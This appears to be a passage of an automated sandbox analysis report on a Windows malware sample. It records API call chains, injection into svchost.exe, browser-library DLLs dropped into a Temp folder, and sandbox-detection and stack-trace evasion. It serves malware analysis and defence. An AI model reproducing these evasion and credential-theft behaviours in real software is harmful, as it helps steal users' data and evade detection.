          Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
          Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
          Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
          Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
          Source: 4QihT6CwD8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 4QihT6CwD8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 4QihT6CwD8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 4QihT6CwD8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 4QihT6CwD8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: ucrtbase.dll.1.drStatic PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003542DE
          Source: msvcp140.dll.1.drStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_00370A76 push ecx; ret 0_2_00370A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D86E push 0040D89Ch; ret 1_2_0040D894
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D870 push 0040D89Ch; ret 1_2_0040D894
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004140C0 push 004140ECh; ret 1_2_004140E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004108C8 push 004108F4h; ret 1_2_004108EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B0F7 push 0040B124h; ret 1_2_0040B11C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B0F8 push 0040B124h; ret 1_2_0040B11C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408080 push 004080B8h; ret 1_2_004080B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408158 push 00408196h; ret 1_2_0040818E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408970 push 004089E4h; ret 1_2_004089DC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408994 push 004089E4h; ret 1_2_004089DC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004089AC push 004089E4h; ret 1_2_004089DC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415208 push 0041528Ch; ret 1_2_00415284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CA0C push 0040CA3Ch; ret 1_2_0040CA34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CA10 push 0040CA3Ch; ret 1_2_0040CA34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417AEC push 00417B18h; ret 1_2_00417B10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404BC0 push 00404C11h; ret 1_2_00404C09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D3C0 push 0040D3ECh; ret 1_2_0040D3E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A3E4 push 0040A410h; ret 1_2_0040A408
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040C390 push 0040C3C0h; ret 1_2_0040C3B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040C394 push 0040C3C0h; ret 1_2_0040C3B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A3AC push 0040A3D8h; ret 1_2_0040A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC44 push 0040DCA3h; ret 1_2_0040DC9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC0C push 0040DC38h; ret 1_2_0040DC30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B41E push 0040B44Ch; ret 1_2_0040B444
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B420 push 0040B44Ch; ret 1_2_0040B444
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A438 push 0040A464h; ret 1_2_0040A45C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A4F4 push 0041A51Ah; ret 1_2_0041A512
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414C80 push 00414CACh; ret 1_2_00414CA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409488 push 004094B8h; ret 1_2_004094B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A4AC push 0041A4E8h; ret 1_2_0041A4E0
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\vcruntime140.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\mozglue.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\msvcp140.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\nssdbm3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\ucrtbase.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\freebl3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\nss3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\softokn3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_0036F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0036F98E
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003E1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003E1C41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_00417B1A
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found API chain indicative of sandbox detection
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97171
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeAPI/Special instruction interceptor: Address: 1143244
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,GetCurrentProcessId,1_2_00416B94
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\nssdbm3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\freebl3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\nss3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\softokn3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3F5A6467\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeAPI coverage: 4.2 %
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_003BDBBE
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C68EE FindFirstFileW,FindClose,0_2_003C68EE
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003C698F
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003BD076
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003BD3A9
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003C9642
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003C979D
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003C9B2B
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003C5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,1_2_004098A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D0A0 FindFirstFileW,1_2_0040D0A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,1_2_004087DC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D06E FindFirstFileW,1_2_0040D06E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose,1_2_0041303C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose,1_2_0040989F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,1_2_004111C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
